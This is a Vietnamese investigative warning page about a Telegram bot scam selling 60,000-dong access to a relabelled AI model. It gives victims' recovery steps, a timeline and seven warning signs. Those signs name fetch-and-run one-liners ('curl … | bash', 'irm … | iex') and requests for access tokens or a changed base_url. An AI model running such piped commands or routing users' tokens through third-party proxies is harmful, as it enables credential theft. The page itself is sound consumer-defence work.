    Lưu bằng chứng trước khi nó biến mất Chụp màn hình: biên lai chuyển khoản, chat với người bán, bài rao bán trong bot, hồ sơ Telegram. Nhiều nhóm bật tự hủy tin nhắn, nên chụp ngay hôm nay.
  • 6
    Báo cáo lên Telegram Dùng nút Report trong hồ sơ bot và tài khoản người bán. Nhiều báo cáo độc lập có trọng lượng hơn một báo cáo dài.
  • 7
    Báo ngân hàng và trình báo cơ quan chức năng Liên hệ ngân hàng với mã giao dịch. Với giao dịch gian dối, bạn có quyền trình báo công an kèm toàn bộ bằng chứng đã lưu. Gom nhóm nhiều nạn nhân sẽ hiệu quả hơn đi lẻ.
  • 8
    Cảnh báo người khác Chia sẻ hồ sơ này. Mỗi người đọc trước khi chuyển 60k là một nạn nhân ít đi, và quan trọng hơn, là một access token không bị lộ.
Và điều cần nhớ nhất

Nếu bạn có ChatGPT Plus, bạn vốn đã dùng được dòng Luna, đúng thứ mà 60.000đ kia bán cho bạn. Không cần proxy, không cần đưa token cho ai, không cần đổi base_url. Mở Codex lên và dùng thẳng tài khoản của chính mình.

Bạn cũng đã mua slot này?

Bấm để được tính vào số người bị ảnh hưởng. Con số này giúp các nạn nhân thấy mình không đơn độc và có cơ sở khi cùng trình báo. Không lưu thông tin cá nhân; bấm lại để bỏ.

Phòng ngừa

Bảy dấu hiệu của cùng một trò, lần sau đổi tên khác

Đường dây này sẽ đổi tên miền, đổi tên model, đổi bot. Cơ chế thì không đổi. Thấy từ hai dấu hiệu trở lên thì dừng lại.

01

Bắt chạy lệnh một dòng

irm … | iex hoặc curl … | bash. Tải script lạ và chạy ngay, không ai kịp đọc. Đây là cửa vào của gần như mọi vụ.

02

“Để bên mình xác minh hộ”

Bất kỳ ai cần token, cookie hay phiên đăng nhập để “kích hoạt”, “xác minh”, “nâng cấp” đều đang xin chìa khóa, không phải xin thông tin.

03

Yêu cầu đổi base_url

Đổi địa chỉ máy chủ API sang domain người bán = toàn bộ dữ liệu của bạn đi qua tay họ. Không có ngoại lệ hợp lệ nào.

04

Bán model “nội bộ / chưa ra mắt”

Model chưa phát hành thì không có đường phân phối hợp pháp qua Telegram với giá 60k. Lời hứa đó tự nó đã là dấu hiệu.

05

Mô tả và hướng dẫn không khớp

Tiêu đề hứa “nâng cấp tài khoản”, hướng dẫn lại là “đổi máy chủ”. Luôn đọc phần hướng dẫn sử dụng, đừng đọc tiêu đề.

06

Rào trước “có thể bị fix”

“Dùng được 14 ngày nếu không bị fix”, “KBH”: người bán biết đây là lỗ hổng và đang cài sẵn đường lui khi khách khiếu nại.

07

Affiliate hoa hồng cao

Hoa hồng 30% biến khách hàng thành người bán hộ. Mô hình này tối ưu cho việc lan nhanh, không phải cho sản phẩm tốt.

Diễn biến

Mốc thời gian

  1. TRƯỚC 29/09/2026
    TUT khai thác được soạn và chuyển giao

    Tác giả TUT tìm ra cách định tuyến Codex qua proxy bằng access token người dùng, rồi chuyển cho người bán thương mại hóa qua bot.

  2. 29/09/2026 · 00:18
    Người mua khoe “ngày bào 400 tỉ token”

    Cùng bình luận đó thừa nhận “kể cả có đè tem”: relabel được chính người mua công nhận.

  3. 29/09/2026
    Giao dịch mua được ghi nhận: 60.000đ

    Chuyển khoản thành công tới tài khoản người bán, làm mẫu đối chứng cho điều tra.

  4. 29/09/2026
    Điều tra kỹ thuật: relabel bị phát hiện

    Bắt traffic bằng mitmproxy, soi catalog, chạy behavioral probe có đối chứng. Cutoff 2024-06 so với 2026-03 của Astra thật; tên gpt-6-astra trả 404 trên proxy.

  5. 01/10/2026 · 17:27–17:42
    Người bán tự khai doanh số và thừa nhận “bịp”

    “Hơn 500 sản phẩm · mỗi cái 60k · kiếm đc 30 củ r” và “Nó bịp đấy / nó để tên loại khác”. Tổng 2 bot ≈ 900 slot.

  6. 01/10/2026
    Fingerprint thống kê khép lại hồ sơ

    ModelTrace cho gpt-5.6-luna attribution 100.0%; gpt-6-astra hạng 10/16 với 0.0%, khớp dòng buffering: gpt-6-luna trong sơ đồ kiến trúc.

  7. 01/10/2026
    Hồ sơ được công bố

    Toàn bộ bằng chứng được tập hợp và công khai để cảnh báo cộng đồng.

Cộng đồng

Bình luận

Bạn cũng đã mua, hoặc có thêm thông tin? Để lại bình luận. Mọi bình luận được duyệt trước khi hiện. Đừng đăng token, mật khẩu, số tài khoản hay thông tin cá nhân của bất kỳ ai.